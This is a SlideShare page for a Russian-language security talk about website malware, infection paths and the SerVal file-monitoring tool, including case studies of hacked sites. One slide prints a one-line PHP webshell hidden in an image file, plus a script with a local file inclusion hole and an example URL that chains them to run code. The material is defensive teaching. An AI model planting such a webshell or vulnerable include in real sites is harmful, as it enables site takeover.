SlideShare a Scribd company logo

SerVal site monitoring presentation - Презентация SerVal

Download as ODP, PDF
E
Elitesru

Презентация SerVal - система мониторинга безопасности сайта

Software
1 of 21
Вирусы, трояны, бекдоры на сайтах: пути заражения и варианты защиты Александр Барычев https://www.facebook.com/barychev.alexander alexander@barychev.ru ICQ #143876457 Skype: dimases77
Малварь - злонамеренная программа ● Вирус — заражение посетителя, через уязвимости в браузере ● Троян — управление сайтом, организация ботнета ● Спам-скрипт — рассылка спама ● Размещение ссылок — коды SAPE, Linkfeed, каталоги ссылок ● Клоакинг с переадресацией трафика
Атакуемые файлы ● .js, .swf — используется для распространения вирусов ● .php, .pl, .cgi — серверные скрипты, через них можно делать все, хоть сервер Пентагона брутить ● .htaccess — установка переадресации (как клоакинг) на другие сайты, чаще всего по User Agent ● .htm, .html — статические ссылочные каталоги, залитые через Webshell
Последствия заражения ● Распространение вирусов ● Рассылка спама ● Атака других сайтов ● Пессимизация в поисковых системах ● Блокировка хостинга ● Попадание IP и домена в черные списки Серьезный урон для бизнеса!
Варианты заражения ● «Угон» из сохраненных паролей с зараженного компьютера ● Через уязвимость на сайте, чаще всего через форму загрузки файлов на сайт ● Через уязвимость авторизации в Панели управления ● Через многочисленные плагины к популярным CMS ● XSS, SQL-injection, LFI
Local File Inclusion avatar.jpg Самый простой WebShell: <?assert(stripslashes($_REQUEST["e"]));?> image.php Скрипт с LFI-инъекцией: <?php // {..} примитивная проверка, которая часто легко обходится if (!isset($_GET['file']) OR !file_exists('./tpl/default/'.$_GET['file'])) die('404 Not Found'); // {..} возможно, проводятся еще какие-то проверки include './tpl/default/'.$_GET['file']; // локальный инклуд файла ?> http://site.com/image.php?file=../../upload/avatar.jpg&e=phpinfo();
Крутой WebShell Позволяет: ● Создавать, изменять и удалять любой файл и директорию ● Выполнять произвольный код и команды bash ● Подключаться и управлять БД
Опасные функции PHP ● eval() - выполнение произвольного кода ● assert() - выполнение произвольного кода ● exec(), shell_exec(), system() - выполнение команд консоли ● base64_decode() - декодирование обфусцированного кода ● preg_replace() с модификатором e — выполнение произвольного кода (запрещено с 2012 года)
Кто под угрозой? ● Пользователи популярных и бесплатных CMS Wordpress, Joomla ● Пользователи популярных и платных CMS ● Любители сохранять пароли в FTP и SCP клиентах, браузерах ● Все, кто использует Apache + PHP ● Любой, у кого есть Вебсервер, который «глядит» в Интернет
Так что же делать? ● Обновить все серверное ПО до актуальных версий ● Провести аудит исходного кода скриптов ● Установить все апдейты на CMS, на модули, на плагины ● Запретить доступ к директориям через http в .htaccess, которым это не нужно ● Отслеживать изменения файлов!
система мониторинга целостности файлов сайта www.serval.site
Как использовать SerVal? ● Скачать с сайта http://www.serval.site ● Установить, запустив инсталляцию, на хостинг в отдельный домен, например, http://serval.moisite.ru, настроить планировщик задач Cron. ● Завести проект — сайт который будет мониторится на изменение файлов ● Получить уникальный PHP-файл сканера для сайта и загрузить его на хостинг ● Обращать внимание на изменения, о которых будет уведомлять система http://www.serval.site
Главная страница http://www.serval.site
Список проектов http://www.serval.site
Кейс взлома altika.ru 05 мая 2016 примерно в 0 часов ночи были добавлены 3 файла: ● /thumbs.php [25655B] ● /webim/styles/original/images/buttons/mysql.php [28786B] ● /webim/styles/original/images/mail.php [233B] http://www.serval.site
Кейс взлома altika.ru Добавлены: ● /xml.php [431B] ● /images/data/inc.php [539B] ● /images/hyundai/general.php [8361B] ● /images/hyundai/test.php [442B] ● /images/hyundai/themes.php [8361B] ● /images/main/config.php [592B] ● и другие (всего 20)... Изменены: ● /chapters/daewoo/config.php [2869B] ● /stats/reports/filters.php [7175B] ● /stats/reports/ip.php [1740B] ● /stats/reports/searchpages.php [7193B] ● /stats/reports/servers.php [2588B] ● и другие (всего 24)... 05 мая 2016 примерно в 5-6 часов утра были http://www.serval.site
Все это показал SerVal http://www.serval.site
Кейс взлома allrad.ru http://www.serval.site
При этом главное: ● Быстро выявить взлом ● Устранить последствия ● Проанализировать и устранить уязвимость Взломать могут каждый сайт! Следите за своими сайтами! http://www.serval.site
В этом поможет вот этот милый котик! Скачивайте, устанавливайте, пользуйтесь! http://www.serval.site
Александр Барычев https://www.facebook.com/barychev.alexander alexander@barychev.ru ICQ #143876457 Skype: dimases77 СПАСИБО ЗА ВНИМАНИЕ! http://www.serval.site

Recommended

Как обезопасить PBN от взлома? Практические рекомендации
Как обезопасить PBN от взлома? Практические рекомендацииКак обезопасить PBN от взлома? Практические рекомендации
Как обезопасить PBN от взлома? Практические рекомендацииNaZapad
 
Андрей Ковалев - Безопасность сайта: мифы и реальность
Андрей Ковалев - Безопасность сайта: мифы и реальностьАндрей Ковалев - Безопасность сайта: мифы и реальность
Андрей Ковалев - Безопасность сайта: мифы и реальностьYandex
 
Выступление Ревизиум на ХостОбзор 2017
Выступление Ревизиум на ХостОбзор 2017Выступление Ревизиум на ХостОбзор 2017
Выступление Ревизиум на ХостОбзор 2017revisium
 
Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...
Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...
Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...Egor Konovalov
 
"На Стачку" - Взлом сайта: 5 стадий принятия неизбежного
"На Стачку" - Взлом сайта: 5 стадий принятия неизбежного"На Стачку" - Взлом сайта: 5 стадий принятия неизбежного
"На Стачку" - Взлом сайта: 5 стадий принятия неизбежногоrevisium
 
Алексей Морозов (Россия), Rambler.ru. ASP.NET в помощь хакеру и не только....
Алексей Морозов (Россия), Rambler.ru. ASP.NET в помощь хакеру и не только....Алексей Морозов (Россия), Rambler.ru. ASP.NET в помощь хакеру и не только....
Алексей Морозов (Россия), Rambler.ru. ASP.NET в помощь хакеру и не только....KazHackStan
 
Почему хакеры выбирают WordPress. WordCamp 2017, Moscow.
Почему хакеры выбирают WordPress. WordCamp 2017, Moscow.Почему хакеры выбирают WordPress. WordCamp 2017, Moscow.
Почему хакеры выбирают WordPress. WordCamp 2017, Moscow.revisium
 
Паша Мурзаков: Как 200 строк на Go помогли нам освободить 15 серверов»
Паша Мурзаков: Как 200 строк на Go помогли нам освободить 15 серверов» Паша Мурзаков: Как 200 строк на Go помогли нам освободить 15 серверов»
Паша Мурзаков: Как 200 строк на Go помогли нам освободить 15 серверов» Badoo Development
 

Recommended

Как обезопасить PBN от взлома? Практические рекомендации
Как обезопасить PBN от взлома? Практические рекомендацииКак обезопасить PBN от взлома? Практические рекомендации
Как обезопасить PBN от взлома? Практические рекомендацииNaZapad
 
Андрей Ковалев - Безопасность сайта: мифы и реальность
Андрей Ковалев - Безопасность сайта: мифы и реальностьАндрей Ковалев - Безопасность сайта: мифы и реальность
Андрей Ковалев - Безопасность сайта: мифы и реальностьYandex
 
Выступление Ревизиум на ХостОбзор 2017
Выступление Ревизиум на ХостОбзор 2017Выступление Ревизиум на ХостОбзор 2017
Выступление Ревизиум на ХостОбзор 2017revisium
 
Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...
Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...
Как сделать проект с 1 500 000 просмотров в сутки, который не ломается - IzhD...Egor Konovalov
 
"На Стачку" - Взлом сайта: 5 стадий принятия неизбежного
"На Стачку" - Взлом сайта: 5 стадий принятия неизбежного"На Стачку" - Взлом сайта: 5 стадий принятия неизбежного
"На Стачку" - Взлом сайта: 5 стадий принятия неизбежногоrevisium
 
Алексей Морозов (Россия), Rambler.ru. ASP.NET в помощь хакеру и не только....
Алексей Морозов (Россия), Rambler.ru. ASP.NET в помощь хакеру и не только....Алексей Морозов (Россия), Rambler.ru. ASP.NET в помощь хакеру и не только....
Алексей Морозов (Россия), Rambler.ru. ASP.NET в помощь хакеру и не только....KazHackStan
 
Почему хакеры выбирают WordPress. WordCamp 2017, Moscow.
Почему хакеры выбирают WordPress. WordCamp 2017, Moscow.Почему хакеры выбирают WordPress. WordCamp 2017, Moscow.
Почему хакеры выбирают WordPress. WordCamp 2017, Moscow.revisium
 
Паша Мурзаков: Как 200 строк на Go помогли нам освободить 15 серверов»
Паша Мурзаков: Как 200 строк на Go помогли нам освободить 15 серверов» Паша Мурзаков: Как 200 строк на Go помогли нам освободить 15 серверов»
Паша Мурзаков: Как 200 строк на Go помогли нам освободить 15 серверов» Badoo Development
 
Безопасность WordPress
Безопасность WordPress Безопасность WordPress
Безопасность WordPress Dmitry Kondryuk
 
KazHackStan 2017 | Tracking
KazHackStan 2017 | TrackingKazHackStan 2017 | Tracking
KazHackStan 2017 | TrackingДмитрий Бумов
 
Безопасность Joomla: мифы и реальность
Безопасность Joomla: мифы и реальностьБезопасность Joomla: мифы и реальность
Безопасность Joomla: мифы и реальностьrevisium
 
Зоопарк python веб-фреймворков
Зоопарк python веб-фреймворковЗоопарк python веб-фреймворков
Зоопарк python веб-фреймворковPyNSK
 
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotem
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotemТатьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotem
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotemKazHackStan
 
Web sockets
Web socketsWeb sockets
Web socketsEugene Lisitsky
 
Eugene Lisitsky Web Sockets
Eugene Lisitsky Web SocketsEugene Lisitsky Web Sockets
Eugene Lisitsky Web Socketsrit2010
 
Оранжевый - новый синий: Как портировать Chrome Extension в Firefox Extension
Оранжевый - новый синий: Как портировать Chrome Extension в Firefox ExtensionОранжевый - новый синий: Как портировать Chrome Extension в Firefox Extension
Оранжевый - новый синий: Как портировать Chrome Extension в Firefox Extensionchaykaborya
 
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...KazHackStan
 
Periculum est in mora
Periculum est in moraPericulum est in mora
Periculum est in moraAlex Karlovich
 
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...KazHackStan
 
Вредные советы для разработчиков
Вредные советы для разработчиковВредные советы для разработчиков
Вредные советы для разработчиковITCrowd Almaty
 
Презентация "Web-интерфейс для автоматизации и мониторинга OpenVPN сети"
Презентация "Web-интерфейс для автоматизации и мониторинга OpenVPN сети"Презентация "Web-интерфейс для автоматизации и мониторинга OpenVPN сети"
Презентация "Web-интерфейс для автоматизации и мониторинга OpenVPN сети"Yuriy Shepitko
 
"Великолепный API без Rest", Констатин Якушев (Badoo)
"Великолепный API без Rest", Констатин Якушев (Badoo) "Великолепный API без Rest", Констатин Якушев (Badoo)
"Великолепный API без Rest", Констатин Якушев (Badoo)Badoo Development
 
Николай Сиварев "Приручая сайты"
Николай Сиварев "Приручая сайты"Николай Сиварев "Приручая сайты"
Николай Сиварев "Приручая сайты"Yandex
 
Что надо знать о HTTP/2
Что надо знать о HTTP/2Что надо знать о HTTP/2
Что надо знать о HTTP/2Badoo Development
 
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...KazHackStan
 
мои модули и патчи для Nginx. максим дунин. зал 1
мои модули и патчи для Nginx. максим дунин. зал 1мои модули и патчи для Nginx. максим дунин. зал 1
мои модули и патчи для Nginx. максим дунин. зал 1rit2011
 
Drupal Paranoia
Drupal ParanoiaDrupal Paranoia
Drupal ParanoiaInna Tuyeva
 
Drupal Paranoia
Drupal ParanoiaDrupal Paranoia
Drupal ParanoiaDrupal Camp Kyiv
 
Сергей Федоров - Современная безопасность от Eset
Сергей Федоров - Современная безопасность от EsetСергей Федоров - Современная безопасность от Eset
Сергей Федоров - Современная безопасность от EsetExpolink
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websitesdefconmoscow
 

More Related Content

What's hot

Безопасность WordPress
Безопасность WordPress Безопасность WordPress
Безопасность WordPress Dmitry Kondryuk
 
Безопасность Joomla: мифы и реальность
Безопасность Joomla: мифы и реальностьБезопасность Joomla: мифы и реальность
Безопасность Joomla: мифы и реальностьrevisium
 
Зоопарк python веб-фреймворков
Зоопарк python веб-фреймворковЗоопарк python веб-фреймворков
Зоопарк python веб-фреймворковPyNSK
 
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotem
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotemТатьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotem
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotemKazHackStan
 
Eugene Lisitsky Web Sockets
Eugene Lisitsky Web SocketsEugene Lisitsky Web Sockets
Eugene Lisitsky Web Socketsrit2010
 
Оранжевый - новый синий: Как портировать Chrome Extension в Firefox Extension
Оранжевый - новый синий: Как портировать Chrome Extension в Firefox ExtensionОранжевый - новый синий: Как портировать Chrome Extension в Firefox Extension
Оранжевый - новый синий: Как портировать Chrome Extension в Firefox Extensionchaykaborya
 
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...KazHackStan
 
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...KazHackStan
 
Вредные советы для разработчиков
Вредные советы для разработчиковВредные советы для разработчиков
Вредные советы для разработчиковITCrowd Almaty
 
Презентация "Web-интерфейс для автоматизации и мониторинга OpenVPN сети"
Презентация "Web-интерфейс для автоматизации и мониторинга OpenVPN сети"Презентация "Web-интерфейс для автоматизации и мониторинга OpenVPN сети"
Презентация "Web-интерфейс для автоматизации и мониторинга OpenVPN сети"Yuriy Shepitko
 
"Великолепный API без Rest", Констатин Якушев (Badoo)
"Великолепный API без Rest", Констатин Якушев (Badoo) "Великолепный API без Rest", Констатин Якушев (Badoo)
"Великолепный API без Rest", Констатин Якушев (Badoo)Badoo Development
 
Николай Сиварев "Приручая сайты"
Николай Сиварев "Приручая сайты"Николай Сиварев "Приручая сайты"
Николай Сиварев "Приручая сайты"Yandex
 
Что надо знать о HTTP/2
Что надо знать о HTTP/2Что надо знать о HTTP/2
Что надо знать о HTTP/2Badoo Development
 
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...KazHackStan
 
мои модули и патчи для Nginx. максим дунин. зал 1
мои модули и патчи для Nginx. максим дунин. зал 1мои модули и патчи для Nginx. максим дунин. зал 1
мои модули и патчи для Nginx. максим дунин. зал 1rit2011
 

What's hot (20)

Безопасность WordPress
Безопасность WordPress Безопасность WordPress
Безопасность WordPress
 
KazHackStan 2017 | Tracking
KazHackStan 2017 | TrackingKazHackStan 2017 | Tracking
KazHackStan 2017 | Tracking
 
Безопасность Joomla: мифы и реальность
Безопасность Joomla: мифы и реальностьБезопасность Joomla: мифы и реальность
Безопасность Joomla: мифы и реальность
 
Зоопарк python веб-фреймворков
Зоопарк python веб-фреймворковЗоопарк python веб-фреймворков
Зоопарк python веб-фреймворков
 
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotem
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotemТатьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotem
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotem
 
Web sockets
Web socketsWeb sockets
Web sockets
 
Eugene Lisitsky Web Sockets
Eugene Lisitsky Web SocketsEugene Lisitsky Web Sockets
Eugene Lisitsky Web Sockets
 
Оранжевый - новый синий: Как портировать Chrome Extension в Firefox Extension
Оранжевый - новый синий: Как портировать Chrome Extension в Firefox ExtensionОранжевый - новый синий: Как портировать Chrome Extension в Firefox Extension
Оранжевый - новый синий: Как портировать Chrome Extension в Firefox Extension
 
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...
 
Periculum est in mora
Periculum est in moraPericulum est in mora
Periculum est in mora
 
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...
 
Вредные советы для разработчиков
Вредные советы для разработчиковВредные советы для разработчиков
Вредные советы для разработчиков
 
Презентация "Web-интерфейс для автоматизации и мониторинга OpenVPN сети"
Презентация "Web-интерфейс для автоматизации и мониторинга OpenVPN сети"Презентация "Web-интерфейс для автоматизации и мониторинга OpenVPN сети"
Презентация "Web-интерфейс для автоматизации и мониторинга OpenVPN сети"
 
"Великолепный API без Rest", Констатин Якушев (Badoo)
"Великолепный API без Rest", Констатин Якушев (Badoo) "Великолепный API без Rest", Констатин Якушев (Badoo)
"Великолепный API без Rest", Констатин Якушев (Badoo)
 
Николай Сиварев "Приручая сайты"
Николай Сиварев "Приручая сайты"Николай Сиварев "Приручая сайты"
Николай Сиварев "Приручая сайты"
 
Что надо знать о HTTP/2
Что надо знать о HTTP/2Что надо знать о HTTP/2
Что надо знать о HTTP/2
 
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...
 
мои модули и патчи для Nginx. максим дунин. зал 1
мои модули и патчи для Nginx. максим дунин. зал 1мои модули и патчи для Nginx. максим дунин. зал 1
мои модули и патчи для Nginx. максим дунин. зал 1
 
Drupal Paranoia
Drupal ParanoiaDrupal Paranoia
Drupal Paranoia
 
Drupal Paranoia
Drupal ParanoiaDrupal Paranoia
Drupal Paranoia
 

Viewers also liked

Сергей Федоров - Современная безопасность от Eset
Сергей Федоров - Современная безопасность от EsetСергей Федоров - Современная безопасность от Eset
Сергей Федоров - Современная безопасность от EsetExpolink
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websitesdefconmoscow
 
Intercepter-NG: сниффер нового поколения
Intercepter-NG: сниффер нового поколенияIntercepter-NG: сниффер нового поколения
Intercepter-NG: сниффер нового поколенияPositive Hack Days
 
4.3. Rat races conditions
4.3. Rat races conditions4.3. Rat races conditions
4.3. Rat races conditionsdefconmoscow
 
анализ кода: от проверки стиля до автоматического тестирования
анализ кода: от проверки стиля до автоматического тестированияанализ кода: от проверки стиля до автоматического тестирования
анализ кода: от проверки стиля до автоматического тестированияRuslan Shevchenko
 
Сергей Полаженко - Security Testing: SQL Injection
Сергей Полаженко - Security Testing: SQL InjectionСергей Полаженко - Security Testing: SQL Injection
Сергей Полаженко - Security Testing: SQL InjectionSQALab
 
Идентификация и аутентификация - встроенные функции безопасности или задачи с...
Идентификация и аутентификация - встроенные функции безопасности или задачи с...Идентификация и аутентификация - встроенные функции безопасности или задачи с...
Идентификация и аутентификация - встроенные функции безопасности или задачи с...Mikhail Vanin
 
Непрерывный анализ качества кода с помощью SonarQube
Непрерывный анализ качества кода с помощью SonarQubeНепрерывный анализ качества кода с помощью SonarQube
Непрерывный анализ качества кода с помощью SonarQubeVasilii Chernov
 
PiterPy#3. DSL in Python. How and why?
PiterPy#3. DSL in Python. How and why?PiterPy#3. DSL in Python. How and why?
PiterPy#3. DSL in Python. How and why?Ivan Tsyganov
 
Описание задач «Научного Хакатона»
Описание задач «Научного Хакатона»Описание задач «Научного Хакатона»
Описание задач «Научного Хакатона»Sciencehit.by
 
Демонстрация атаки на ДБО
Демонстрация атаки на ДБОДемонстрация атаки на ДБО
Демонстрация атаки на ДБОDmitry Evteev
 
Тестирование защищенности веб-приложений
Тестирование защищенности веб-приложенийТестирование защищенности веб-приложений
Тестирование защищенности веб-приложенийSQALab
 
Город никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsГород никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsPositive Hack Days
 
Как начать бизнес в ИБ
Как начать бизнес в ИБКак начать бизнес в ИБ
Как начать бизнес в ИБPositive Hack Days
 
Цикл безопасной разработки
Цикл безопасной разработкиЦикл безопасной разработки
Цикл безопасной разработкиRISClubSPb
 
Sql инъекции в тестировании
Sql инъекции в тестированииSql инъекции в тестировании
Sql инъекции в тестированииISsoft
 

Viewers also liked (16)

Сергей Федоров - Современная безопасность от Eset
Сергей Федоров - Современная безопасность от EsetСергей Федоров - Современная безопасность от Eset
Сергей Федоров - Современная безопасность от Eset
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websites
 
Intercepter-NG: сниффер нового поколения
Intercepter-NG: сниффер нового поколенияIntercepter-NG: сниффер нового поколения
Intercepter-NG: сниффер нового поколения
 
4.3. Rat races conditions
4.3. Rat races conditions4.3. Rat races conditions
4.3. Rat races conditions
 
анализ кода: от проверки стиля до автоматического тестирования
анализ кода: от проверки стиля до автоматического тестированияанализ кода: от проверки стиля до автоматического тестирования
анализ кода: от проверки стиля до автоматического тестирования
 
Сергей Полаженко - Security Testing: SQL Injection
Сергей Полаженко - Security Testing: SQL InjectionСергей Полаженко - Security Testing: SQL Injection
Сергей Полаженко - Security Testing: SQL Injection
 
Идентификация и аутентификация - встроенные функции безопасности или задачи с...
Идентификация и аутентификация - встроенные функции безопасности или задачи с...Идентификация и аутентификация - встроенные функции безопасности или задачи с...
Идентификация и аутентификация - встроенные функции безопасности или задачи с...
 
Непрерывный анализ качества кода с помощью SonarQube
Непрерывный анализ качества кода с помощью SonarQubeНепрерывный анализ качества кода с помощью SonarQube
Непрерывный анализ качества кода с помощью SonarQube
 
PiterPy#3. DSL in Python. How and why?
PiterPy#3. DSL in Python. How and why?PiterPy#3. DSL in Python. How and why?
PiterPy#3. DSL in Python. How and why?
 
Описание задач «Научного Хакатона»
Описание задач «Научного Хакатона»Описание задач «Научного Хакатона»
Описание задач «Научного Хакатона»
 
Демонстрация атаки на ДБО
Демонстрация атаки на ДБОДемонстрация атаки на ДБО
Демонстрация атаки на ДБО
 
Тестирование защищенности веб-приложений
Тестирование защищенности веб-приложенийТестирование защищенности веб-приложений
Тестирование защищенности веб-приложений
 
Город никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsГород никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never Sleeps
 
Как начать бизнес в ИБ
Как начать бизнес в ИБКак начать бизнес в ИБ
Как начать бизнес в ИБ
 
Цикл безопасной разработки
Цикл безопасной разработкиЦикл безопасной разработки
Цикл безопасной разработки
 
Sql инъекции в тестировании
Sql инъекции в тестированииSql инъекции в тестировании
Sql инъекции в тестировании
 

Similar to SerVal site monitoring presentation - Презентация SerVal

Защита сайта от взлома и вирусов
Защита сайта от взлома и вирусовЗащита сайта от взлома и вирусов
Защита сайта от взлома и вирусовSkillFactory
 
Rsnx tsvetkov che btrix conf 2015
Rsnx tsvetkov che btrix conf 2015Rsnx tsvetkov che btrix conf 2015
Rsnx tsvetkov che btrix conf 2015Yulia Karpova
 
11 лекция, петр волков
11 лекция, петр волков11 лекция, петр волков
11 лекция, петр волковkarina krew
 
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеровКак защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеровYandex
 
Лечение мобильных, поисковых редиректов и дорвеев на сайте
Лечение мобильных, поисковых редиректов и дорвеев на сайте Лечение мобильных, поисковых редиректов и дорвеев на сайте
Лечение мобильных, поисковых редиректов и дорвеев на сайте revisium
 
как не заразить посетителей своего сайта All а.сидоров, п.волков
как не заразить посетителей своего сайта All а.сидоров, п.волковкак не заразить посетителей своего сайта All а.сидоров, п.волков
как не заразить посетителей своего сайта All а.сидоров, п.волковOntico
 
Доктор Веб. Кирилл Тезиков "Dr.Web Enterprise Security Suite. Защита бизнеса ...
Доктор Веб. Кирилл Тезиков "Dr.Web Enterprise Security Suite. Защита бизнеса ...Доктор Веб. Кирилл Тезиков "Dr.Web Enterprise Security Suite. Защита бизнеса ...
Доктор Веб. Кирилл Тезиков "Dr.Web Enterprise Security Suite. Защита бизнеса ...Expolink
 
Доктор веб. Кирилл Тезиков. "Dr.Web Enterprise Security Suite. Защита бизнеса...
Доктор веб. Кирилл Тезиков. "Dr.Web Enterprise Security Suite. Защита бизнеса...Доктор веб. Кирилл Тезиков. "Dr.Web Enterprise Security Suite. Защита бизнеса...
Доктор веб. Кирилл Тезиков. "Dr.Web Enterprise Security Suite. Защита бизнеса...Expolink
 
Земсков - Как обеспечить безопасность клиентских сайтов в процессе оказания у...
Земсков - Как обеспечить безопасность клиентских сайтов в процессе оказания у...Земсков - Как обеспечить безопасность клиентских сайтов в процессе оказания у...
Земсков - Как обеспечить безопасность клиентских сайтов в процессе оказания у...SEO Conference
 
Переход сайта на Https - инструкция от WebCanape
Переход сайта на Https - инструкция от WebCanapeПереход сайта на Https - инструкция от WebCanape
Переход сайта на Https - инструкция от WebCanapeWebCanape
 
Взломать Нельзя Защитить: как взламывают сайты и как их эффективно защищать
Взломать Нельзя Защитить: как взламывают сайты и как их эффективно защищатьВзломать Нельзя Защитить: как взламывают сайты и как их эффективно защищать
Взломать Нельзя Защитить: как взламывают сайты и как их эффективно защищатьrevisium
 
Как быть с большими сайтами на Word press
Как быть с большими сайтами на Word pressКак быть с большими сайтами на Word press
Как быть с большими сайтами на Word pressvovasik
 
Site secure (maxim_lagutin)
Site secure (maxim_lagutin)Site secure (maxim_lagutin)
Site secure (maxim_lagutin)SiteSecure
 
Как обеспечить безопасность клиентских сайтов
Как обеспечить безопасность клиентских сайтовКак обеспечить безопасность клиентских сайтов
Как обеспечить безопасность клиентских сайтовrevisium
 
Защищаем WordPress-сайт от хакерских атак
Защищаем WordPress-сайт от хакерских атакЗащищаем WordPress-сайт от хакерских атак
Защищаем WordPress-сайт от хакерских атакRuslan Sukhar
 
Безопасность Joomla: теория и практика
Безопасность Joomla: теория и практикаБезопасность Joomla: теория и практика
Безопасность Joomla: теория и практикаrevisium
 
браузеры презентация
браузеры презентациябраузеры презентация
браузеры презентация4ertenka
 

Similar to SerVal site monitoring presentation - Презентация SerVal (20)

Защита сайта от взлома и вирусов
Защита сайта от взлома и вирусовЗащита сайта от взлома и вирусов
Защита сайта от взлома и вирусов
 
Rsnx tsvetkov che btrix conf 2015
Rsnx tsvetkov che btrix conf 2015Rsnx tsvetkov che btrix conf 2015
Rsnx tsvetkov che btrix conf 2015
 
11 лекция, петр волков
11 лекция, петр волков11 лекция, петр волков
11 лекция, петр волков
 
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеровКак защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
 
Лечение мобильных, поисковых редиректов и дорвеев на сайте
Лечение мобильных, поисковых редиректов и дорвеев на сайте Лечение мобильных, поисковых редиректов и дорвеев на сайте
Лечение мобильных, поисковых редиректов и дорвеев на сайте
 
как не заразить посетителей своего сайта All а.сидоров, п.волков
как не заразить посетителей своего сайта All а.сидоров, п.волковкак не заразить посетителей своего сайта All а.сидоров, п.волков
как не заразить посетителей своего сайта All а.сидоров, п.волков
 
Major mistakes in site moving
Major mistakes in site movingMajor mistakes in site moving
Major mistakes in site moving
 
Доктор Веб. Кирилл Тезиков "Dr.Web Enterprise Security Suite. Защита бизнеса ...
Доктор Веб. Кирилл Тезиков "Dr.Web Enterprise Security Suite. Защита бизнеса ...Доктор Веб. Кирилл Тезиков "Dr.Web Enterprise Security Suite. Защита бизнеса ...
